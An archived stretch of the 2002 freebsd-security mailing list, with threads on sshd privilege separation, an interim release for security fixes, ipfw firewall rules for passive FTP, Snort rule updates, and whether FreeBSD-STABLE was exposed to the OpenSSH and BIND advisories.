MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 02 July 2002 05:39 pm, Dag-Erling Smorgrav wrote: = Mikhail Teterin writes: = > With the privilege separation enabled, there are two sshd processes per = > each session. If, however, I kill the [priv] one after logging in, the = > session continues to work properly... Perhaps, the [priv] part should = > exit by itself? I must be missing something... = = If you kill the monitor, you won't be able to do stuff like connect to = forwarded ports etc., I just verified, that forwarded ports continue to work -- both the -L and the -R ones. = and your session might not be properly shut down fter you disconnect. What exactly will break? At least, the w(1)'s output is correct after the disconnection -- shell is responsible for that. What else? Thanks! -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 15:41:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DAA437B400 for ; Tue, 2 Jul 2002 15:41:30 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1B27B43E13 for ; Tue, 2 Jul 2002 15:41:30 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 3FE1D534B; Wed, 3 Jul 2002 00:41:28 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Mikhail Teterin Cc: security@FreeBSD.org Subject: Re: two sshd processes per session? References: <200207021141.34021.mi+mx@aldan.algebra.com> <200207021829.44485.mi+mx@aldan.algebra.com> From: Dag-Erling Smorgrav Date: 03 Jul 2002 00:41:27 +0200 In-Reply-To: <200207021829.44485.mi+mx@aldan.algebra.com> Message-ID: Lines: 22 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Mikhail Teterin writes: > What exactly will break? At least, the w(1)'s output is correct after > the disconnection -- shell is responsible for that. What else? pam_close_session() will not run, for one. This could mean for instance that locally cached copies of Kerberos tickets you obtained when you logged in won't be removed. I'm not sure that's a security risk, but it could fill up your /tmp after a while. Also, protocol version 2 allows multiple ptys per connection (i.e. you can connect to an ssh server and open a shell, then later open a second shell through the same TCP connection). OpenSSH's ssh client doesn't support this, but many other clients do (PuTTY, for instance), and the OpenSSH server does. If you try to do this after having killed the monitor, not only will you not get a second shell but the unprivileged process will probably (I haven't checked the source) log an error and abort, killing your first shell and any tunneled connections you might have. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 16: 0:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F2A2E37B41F for ; Tue, 2 Jul 2002 16:00:34 -0700 (PDT) Received: from web10104.mail.yahoo.com (web10104.mail.yahoo.com [216.136.130.54]) by mx1.FreeBSD.org (Postfix) with SMTP id A20D143E3B for ; Tue, 2 Jul 2002 16:00:34 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020702230034.1316.qmail@web10104.mail.yahoo.com> Received: from [68.5.49.41] by web10104.mail.yahoo.com via HTTP; Tue, 02 Jul 2002 16:00:34 PDT Date: Tue, 2 Jul 2002 16:00:34 -0700 (PDT) From: twig les Subject: Re: security fixes To: Brett Glass , Wincent Colaiuta , freebsd-security@FreeBSD.ORG In-Reply-To: <4.3.2.7.2.20020702155758.00e9a2c0@localhost> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Absolute agreement. --- Brett Glass wrote: > At 11:22 AM 7/2/2002, Wincent Colaiuta wrote: > > >So on production systems track RELENG_4_6 now, and > when that stops being updated, start tracking > RELENG_4_7, and so on.... > > With the flurry of changes going on (including the > OpenSSH hole and libc > hole in the base install and the Apache > vulnerability in the ports and > packages), it'd be nice to see an interim release. > Who here would be > in favor of that? Who, on the FreeBSD Core Team, > might make the decision > to do an interim release before 4.7 (scheduled for > October)? (Yes, it > takes work to put out a release, but do we really > want everyone who wants > a secure system to have to install from -STABLE > snapshots, running the > risk of picking a bad day, for four months?) > > --Brett Glass > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- All warfare is based on deception. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Sign up for SBC Yahoo! Dial - First Month Free http://sbc.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 16: 1: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BCDC637B400 for ; Tue, 2 Jul 2002 16:00:57 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 18A9743E13 for ; Tue, 2 Jul 2002 16:00:57 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.236.54] by mail.gbronline.com (SMTPD32-7.10) id A04852CA0100; Tue, 02 Jul 2002 17:59:20 -0500 Message-ID: <064901c2221c$4120ea20$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Wincent Colaiuta" , References: <592EA664-8DE0-11D6-A483-003065C60B4C@mac.com> Subject: Re: security fixes Date: Tue, 2 Jul 2002 18:00:25 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Wincent Colaiuta" To: Sent: Tuesday, July 02, 2002 12:22 PM Subject: Re: security fixes El Tuesday, 2 July, 2002, a las 05:37 AM, Kevin Kinsey, DaleCo, S.P. escribió: > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. ]So on production systems track RELENG_4_6 now, and when that stops being ]updated, start tracking RELENG_4_7, and so on.... I can't see any ]problems with that. That way you're tracking the security fixes and ]critical patches, and then when you need to you're upgrading your entire ]system in safe way. ] ]I think the advice to not track STABLE on production machines is good. ]Sure, STABLE is mostly exactly that: STABLE. But there are always going ]to be exceptions... The last thing you want is a machine that won't boot ]after something went wrong and you have to pay $$$ to get access to the ]datacentre and rescue the machine... ] ]Cheers ]Wincent Nothing wrong with your advice either. Although in my world, if anyone's server quits responding, I've got a red carpet straight to the box as soon as I can get there... I'm in the 'small' world, though; to each his own....Wincent, are you in anyway related to a famous drummer? Kevin Kinsey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 16:26: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B9B6C37B400 for ; Tue, 2 Jul 2002 16:26:02 -0700 (PDT) Received: from topperwein.dyndns.org (acs-24-154-28-203.zoominternet.net [24.154.28.203]) by mx1.FreeBSD.org (Postfix) with ESMTP id AF6E243E09 for ; Tue, 2 Jul 2002 16:26:01 -0700 (PDT) (envelope-from behanna@zbzoom.net) Received: from topperwein (topperwein [192.168.168.10]) by topperwein.dyndns.org (8.12.5/8.12.5) with ESMTP id g62NQ1tl014980 for ; Tue, 2 Jul 2002 19:26:01 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Tue, 2 Jul 2002 19:25:56 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: FreeBSD Security Subject: Re: security fixes In-Reply-To: <20020702230034.1316.qmail@web10104.mail.yahoo.com> Message-ID: <20020702191848.O13868-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 2 Jul 2002, twig les wrote: > Absolute agreement. OK, then. Ante up, say, $7000 apiece to get two people working on this full-time, and you might get 4.6.1 in six weeks.[1] As an alternative, for your customers, you might build a custom release from a known working snapshot of -STABLE that you've tested the bejeezus out of. > --- Brett Glass wrote: > > At 11:22 AM 7/2/2002, Wincent Colaiuta wrote: > > > > >So on production systems track RELENG_4_6 now, and > > when that stops being updated, start tracking > > RELENG_4_7, and so on.... > > > > With the flurry of changes going on (including the OpenSSH hole > > and libc hole in the base install and the Apache vulnerability in > > the ports and packages), it'd be nice to see an interim release. > > Who here would be in favor of that? Who, on the FreeBSD Core Team, > > might make the decision to do an interim release before 4.7 > > (scheduled for October)? (Yes, it takes work to put out a release, > > but do we really want everyone who wants a secure system to have > > to install from -STABLE snapshots, running the risk of picking a > > bad day, for four months?) -- Chris BeHanna http://www.pennasoft.com Principal Consultant PennaSoft Corporation chris@pennasoft.com [1] I am neither a committer, nor a member of core, nor a member of the RE team.[2] I can't make this commitment on their behalf. I wrote this to illustrate to you what kind of effort is involved, and what kind of time frame is involved.[3][4] [2] I was the RE at my last job. I know firsthand that it ain't just turning a crank on a CVS snapshot to get a release. [3] Unless the FreeBSD Project is willing to postpone or drop 5.0-DP2, which I highly doubt, or to postpone or drop 5.0-RELEASE, which I highly doubt, or to postpone or drop 4.7-RELEASE, which I highly doubt. There's too much going on in this *volunteer* project to cater to everyone's whim, desire, or hobby horse. [4] The effort to put some of these changes into RELENG_4_6 is somewhat less, but still nontrivial and, again, it's not my call. It's far more likely to happen if you offer to do some or all of the work. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 16:37:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DBB437B401; Tue, 2 Jul 2002 16:37:10 -0700 (PDT) Received: from tartarus.telenet-ops.be (tartarus.telenet-ops.be [195.130.132.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B93443E31; Tue, 2 Jul 2002 16:37:09 -0700 (PDT) (envelope-from stefan.dens@pandora.be) Received: from localhost (localhost.localdomain [127.0.0.1]) by tartarus.telenet-ops.be (Postfix) with SMTP id 31438DBA42; Wed, 3 Jul 2002 01:37:08 +0200 (CEST) Received: from piii500 (D577A05F.kabel.telenet.be [213.119.160.95]) by tartarus.telenet-ops.be (Postfix) with SMTP id 484D2DB997; Wed, 3 Jul 2002 01:37:07 +0200 (CEST) Message-ID: <002501c22222$17a1fe40$0201010a@piii500> From: "Stefan Dens" To: "Steve McGhee" , Cc: , References: <3D20C250.1020603@lmri.ucsb.edu> Subject: Re: [Snort-users] instant snort sigs for new vulnerabilites Date: Wed, 3 Jul 2002 01:42:13 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Well, you can do that with snortcenter, you can adjust rules to your own network setting and update them from the internet without changing your own configuration. The only problem is that snortcenter needs build-in user authentication, if you want to run it from a cron job with lynx or wget. I will make an option to disable it for auto-update. http://users.pandora.be/larc (Just a remark: if to many people are gone use some sort of auto-update utility, to fetch the snortrules from the snort website, I'll guess there bandwidth will be gone. And I know that there is a checksum for the snortrules file, but it seems to change every hour without there is a change to the rules.) Stefan Dens ----- Original Message ----- From: "Steve McGhee" To: Cc: ; Sent: Monday, July 01, 2002 10:57 PM Subject: [Snort-users] instant snort sigs for new vulnerabilites > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > with all the fuss lately over the new apache worm, etc, id like to know > if my machine is getting hit (its patched, just being curious). i know > about mod_blowchunks, but im looking for something more general.. > > it seems to me that snort could see these attacks pretty easily. > > is there a tool/method out there that will retrieve the *latest* snort > signatures automatically? for those of us not running snort via CVS, id > like a way to do something like cvsup, but _only_ update my ruleset > every night or whatever. > > i cc: the freebsd team as this might be a cool (simple) port. (something > like /usr/ports/security/snort-signatures) > > this could be helpful to people who are just curious, or maybe could > provide some good numbers to shock lazy sysadmins into actually patching > their machines. > > > ..of course, this is all assuming there's someone out there writing > signatures ;) > > - -- > - -steve > > ~ .......................................................... > ~ Steve McGhee > ~ Systems Administrator > ~ Linguistic Minority Research Institute > ~ UC Santa Barbara > ~ phone: (805)893-2683 > ~ email: stevem@lmri.ucsb.edu > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.5.8 > Comment: Using PGP with Mozilla - http://enigmail.mozdev.org > > iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns > BcxrxnUpvAJK3Sczy5nY4Ir5 > =9LCO > -----END PGP SIGNATURE----- > > > > ------------------------------------------------------- > This sf.net email is sponsored by:ThinkGeek > No, I will not fix your computer. > http://thinkgeek.com/sf > _______________________________________________ > Snort-users mailing list > Snort-users@lists.sourceforge.net > Go to this URL to change user options or unsubscribe: > https://lists.sourceforge.net/lists/listinfo/snort-users > Snort-users list archive: > http://www.geocrawler.com/redir-sf.php3?list=snort-users > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 16:51:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B399737B400 for ; Tue, 2 Jul 2002 16:51:45 -0700 (PDT) Received: from web10101.mail.yahoo.com (web10101.mail.yahoo.com [216.136.130.51]) by mx1.FreeBSD.org (Postfix) with SMTP id 3A1D343E09 for ; Tue, 2 Jul 2002 16:51:45 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020702235144.62834.qmail@web10101.mail.yahoo.com> Received: from [68.5.49.41] by web10101.mail.yahoo.com via HTTP; Tue, 02 Jul 2002 16:51:44 PDT Date: Tue, 2 Jul 2002 16:51:44 -0700 (PDT) From: twig les Subject: Re: security fixes To: Chris BeHanna , FreeBSD Security In-Reply-To: <20020702191848.O13868-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Yak yak yak. Someone asked who thought it was a good idea and I did. Deal with it. > Chris BeHanna > http://www.pennasoft.com > Principal Consultant > PennaSoft Corporation > chris@pennasoft.com > > [1] I am neither a committer, nor a member of core, > nor a member of > the RE team.[2] I can't make this commitment > on their behalf. I > wrote this to illustrate to you what kind of > effort is involved, > and what kind of time frame is involved.[3][4] > > [2] I was the RE at my last job. I know firsthand > that it ain't just > turning a crank on a CVS snapshot to get a > release. > > [3] Unless the FreeBSD Project is willing to > postpone or drop > 5.0-DP2, which I highly doubt, or to postpone > or drop 5.0-RELEASE, > which I highly doubt, or to postpone or drop > 4.7-RELEASE, which I > highly doubt. There's too much going on in > this *volunteer* > project to cater to everyone's whim, desire, or > hobby horse. > > [4] The effort to put some of these changes into > RELENG_4_6 is > somewhat less, but still nontrivial and, again, > it's not my call. > It's far more likely to happen if you offer to > do some or all of > the work. ===== ----------------------------------------------------------- All warfare is based on deception. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Sign up for SBC Yahoo! Dial - First Month Free http://sbc.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 17:33:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 760E737B400 for ; Tue, 2 Jul 2002 17:33:30 -0700 (PDT) Received: from vec.nogood.org (CPE00045a0a55e6.cpe.net.cable.rogers.com [24.101.6.138]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D01443E46 for ; Tue, 2 Jul 2002 17:33:29 -0700 (PDT) (envelope-from getsubmail@nogood.org) Received: from cport (cport.local [192.168.1.120]) by vec.nogood.org (8.12.5/8.12.5) with SMTP id g630Wm9V083637; Tue, 2 Jul 2002 20:32:49 -0400 (EDT) (envelope-from getsubmail@nogood.org) From: "getsubmail" To: "Marcel Dijk" Cc: Subject: RE: Making a firewall more closed Date: Tue, 2 Jul 2002 20:33:22 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <01ea01c221e3$43a62550$0200a8c0@winxp> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In passive ftp, the client (your computer) initiates a second connection to a high port, that the server specifies, for data upload/download. Such a high port (ephemeral port) could be 1024-5000 inclusive for MS IIS default, or it could be 49152-65535 for Free/OpenBSD default, or it could be in any port range that the ftp site owner is pleased to choose. So, to allow passive ftp, you would need to add 500 allow log ftp from me to any 1024-65535 keep-state out The primary purpose of having a firewall is to protect your computer/network from outside intrusion. Sometimes companies, for internal security reasons, would block outgoing connections too. In your case, allowing outgoing connections might NOT be a security risk. > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Marcel Dijk > Sent: July 2, 2002 12:12 PM > To: security@FreeBSD.ORG > Subject: Making a firewall more closed > > > Yes, that works! Thanks very much for your help. > > Now I have another problem, I can log in to an FTP site but then > I get this > message: > > 227 Entering Passive Mode (212,120,66,212,248,134) > Data Socket Error: Connection Failed > > I think I should open ports 1024 - 65535 ? But that would mean a great > security risk? > > Thanks, > > Marcel. > > > > > You forgot about DNS. If you change rule 550 from > > add 550 allow log udp from me to any 21,80 keep-state out > > to > > add 550 allow log udp from me to any 21,53,80 keep-state out > > it should work. > > > > You may want to find out what IPs you use for DNS, and > specifically allow > > those addresses. > > > > I loaded your rules and im not having any problems now. > > > > > > > > On Monday 01 July 2002 07:05 pm, nascar24 wrote: > > > This is my current ruleset: > > > > > > # allow loopback traffic > > > add 100 allow ip from any to any via lo0 > > > > > > # protect loopback address > > > add 200 deny log ip from 127.0.0.1 to any > > > add 249 deny log ip from any to 127.0.0.1 > > > > > > # block spoofs > > > add 400 deny log ip from me to any in via ed0 > > > > > > # enable NATD > > > add 425 divert 8668 ip from any to any via ed0 > > > > > > # check dynamic rules > > > add 450 check-state > > > > > > # make dynamic entries for all outgoing traffic > > > add 500 allow log tcp from me to any 1-65535 keep-state out > > > add 550 allow log udp from me to any 1-65535 keep-state out > > > > > > # services we offer to the world > > > add 600 allow log tcp from any to me 22,5067,5617,8472,10000 > keep-state > in > > > > > > # pass ICMP > > > add 700 allow log icmp from me to any out > > > add 750 allow log icmp from any to me in > > > > > > # pass everything on private LAN > > > add 800 allow log all from 192.168.0.0/16 to any > > > add 850 allow log all from any to 192.168.0.0/16 > > > > > > # log rejects that have fallen through > > > add 65000 deny log ip from any to any > > > > > > Whith this ruleset I can browse websites, FTP sites etc. > > > > > > But when I replace rules 500 and 550 with this: > > > > > > add 500 allow log tcp from me to any 21,80 keep-state out > > > add 550 allow log udp from me to any 21,80 keep-state out > > > > > > I cannot acces any websites nor FTP sites. But I guess I had just > allowed > > > it? > > > > > > Or is the 'out' the problem here. > > > > > > Marcel. > > > > > > On Monday 01 July 2002 06:45 pm, nascar24 wrote: > > > > What I mean is that I want to grand acces to the internet. > But only to > > > > ports I 'trust', like 80,21,22 etc. But when I make a rule like: > > > > > > > > add 550 allow ip from me to any 80,21,22 > > > > > > > > I cannot acces a website, that puzzles me. > > > > > > There is a problem with the rule in the example: You allowed > traffic to > > > leave > > > through those ports, but not to enter. We can fix this rule: > > > > > > add 550 allow tcp from me to any 80,21,22 keep-state > > > > > > I noticed you already had a rule 550 - you may want to give it a > different > > > number. IPFW (running 4.5R here) gives the following error when trying > to > > > load your rule: > > > > > > ipfw: only TCP and UDP protocols are valid with port specifications > > > > > > hence why i changed it from ip to tcp. > > > > > > GL > > > > -- > > ---------- > > Ramsey G. Brenner > > rgbrenner@myrealbox.com > > http://rgbrenner.cjb.net/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 17:59:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9324E37B400 for ; Tue, 2 Jul 2002 17:59:16 -0700 (PDT) Received: from hotmail.com (f196.law11.hotmail.com [64.4.17.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5D9F743E4A for ; Tue, 2 Jul 2002 17:59:16 -0700 (PDT) (envelope-from kimokasawa@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 2 Jul 2002 17:59:16 -0700 Received: from 68.49.49.165 by lw11fd.law11.hotmail.msn.com with HTTP; Wed, 03 Jul 2002 00:59:15 GMT X-Originating-IP: [68.49.49.165] From: "Kim Okasawa" To: freebsd-security@FreeBSD.ORG Subject: Any security issues with root's cron job? Date: Wed, 03 Jul 2002 09:59:15 +0900 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 03 Jul 2002 00:59:16.0152 (UTC) FILETIME=[DA9E7B80:01C2222C] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dear all, I want to set up a crob job to run a script (Perl or shell). The script will be read/write/exec by root only (i.e. 700 or -rwx------). It will run /sbin/ipfw periodically to change rules according to need. Can anyone think of any potential security risks to such practice? Any suggestions and comments are greatly appreciated. Thank you! Best Regards, Kim Okasawa _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18: 3:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3ED2637B400 for ; Tue, 2 Jul 2002 18:03:51 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id C1F9743E0A for ; Tue, 2 Jul 2002 18:03:50 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 55615534A; Wed, 3 Jul 2002 03:03:47 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Peter Brezny" Cc: Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:03:46 +0200 In-Reply-To: Message-ID: Lines: 24 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Peter Brezny" writes: > I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE > FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the > problem listed in CA-2002-18 from CERT. > > it doesn't appear so since it's running Openssh_2.9 and > http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable. I don't know how many times I have to say this: FreeBSD-STABLE's version of OpenSSH is not vulnerable. Anyone who tells you otherwise is lying or misinformed. The OpenBSD advisory is (quite possibly intentionally) misleading. It lists FreeBSD as vulnerable becaue FreeBSD-CURRENT was, for about three months (late March to late June 2002). Note that by the standards OpenBSD apply to their own software, FreeBSD is not and was never vulnerable, because no FreeBSD release ever shipped with a vulnerable version of OpenSSH. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18: 9:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E60FC37B400 for ; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 84C3E43E09 for ; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.4/8.12.3) with ESMTP id g6319UT4008966; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.4/8.12.3/Submit) id g6319Ufb008965; Tue, 2 Jul 2002 18:09:30 -0700 (PDT) (envelope-from dillon) Date: Tue, 2 Jul 2002 18:09:30 -0700 (PDT) From: Matthew Dillon Message-Id: <200207030109.g6319Ufb008965@apollo.backplane.com> To: Dag-Erling Smorgrav Cc: "Peter Brezny" , Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since were on the subject of vulnerabilities, I am massively confused over the reported BIND/NAMED vulnerability. My question is simple: Is the named in -stable currently vulnerable or has it been fixed? I know the port is fixed. What about the named sitting in -stable? Thanks, -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 18:18:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 944BF37B400 for ; Tue, 2 Jul 2002 18:18:31 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 045E943E4A for ; Tue, 2 Jul 2002 18:18:31 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id E74E7534D; Wed, 3 Jul 2002 03:18:28 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Matthew Dillon Cc: "Peter Brezny" , Subject: Re: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response References: <200207030109.g6319Ufb008965@apollo.backplane.com> From: Dag-Erling Smorgrav Date: 03 Jul 2002 03:18:28 +0200 In-Reply-To: <200207030109.g6319Ufb008965@apollo.backplane.com> Message-ID: Lines: 12 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew Dillon writes: > My question is simple: Is the named in -stable currently vulnerable or > has it been fixed? I know the port is fixed. What about the named > sitting in -stable? As far as I know, named itself is not vulnerable, but libbind contains the bug, and software that uses libbind's gethost*() (nothing in the base system does) is vulnerable. DES -- 